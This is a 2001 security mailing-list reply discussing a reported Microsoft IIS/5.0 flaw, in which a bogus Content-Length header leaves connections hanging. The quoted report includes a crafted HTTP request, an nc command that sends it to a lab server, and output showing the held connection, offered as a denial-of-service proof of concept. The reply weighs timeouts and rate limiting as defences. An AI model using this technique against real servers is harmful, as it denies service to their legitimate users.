RE: Microsoft IIS/5 bogus Content-length bug.

["Eric Fleischman" <eric () sybr com>]

Ivan et al.,

Well if the server *never* closes the connection I'd think (off of the top
of my head) that this is a bad thing. I would think there should be a
timeout. However, even with a timeout the problem is still there. If you set
the timeout to 10 seconds (to pick a random value) I'd answer that by saying
"well make the requests faster". 5 seconds, make them even faster.....you
get the point.

The concept behind this bug/attack/DoS/whatever you want to call it is
similar to so many others we see. User sends a bogus request which takes
advantage of a protocol specification and in doing so causes the server to
hang as it anticipates more data. I'd put this in the same category as so
many of the SYN attacks we see.

While I don't think there is a sure fire fix, the approach I'd think is to
limit the "amount of service" that a user can request. IE if you see that IP
address A.B.C.D makes 500 requests in a second or 2 (or whatever threshold
you select), that's probably a sign of something that isn't quite right.

Of course you could spoof your IP and select tons of random IP's out
there.....for that I don't have a great answer. I'd think maybe if you see
too many of any one "type" of request that's a bad sign, but designing a
heuristic to identify a type of request that is general enough to really
encompass all of the possibilities without denying legitimate users access
to the resources at hand seems like a non-trivial exercise.

Eric

--------------------------------------------
Eric Fleischman
Systems Engineer
Synergy Brands, Inc.



-----Original Message-----
From: Ivan Hernandez Puga [mailto:ivan.hernandez () globalsis com ar]
Sent: Tuesday, December 11, 2001 10:32 AM
To: focus-ms () securityfocus com
Cc: bugtraq () securityfocus com
Subject: Microsoft IIS/5 bogus Content-length bug.


Let's say that it's a bug, not a security flaw, but probably can lead
into denial of service with some tweaking.
When you send a bad request to Microsoft IIS/5.0 server it gives you the
error and closes the connection, like when you fail to authenticate.
Well... let's take a look to a normal request:
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic

And then let's add a "Content-Length: 5300643" field.

When you send the new request to the server ir hangs there waiting
something to happen and never closes the connection.

Let's try this:
$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt

$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
      PID    PPID    PGID     WINPID  TTY  UID    STIME COMMAND
      696       1     696        696  con  500 12:22:37 /usr/bin/bash
     2464     696    2464       2464  con  500 12:23:56 /usr/bin/nc
     2532     696    2532       1552  con  500 12:29:16 /usr/bin/ps

$ netstat -an |grep 192.168.0.10
  TCP    192.168.0.4:2479       192.168.0.10:80        ESTABLISHED

Now you have a waiting open connection. You can open as much as you
want. The server never stops the connections and I have seen no timeout.

Well, I left this here.

Thanks for the time of reading

Ivan Hernandez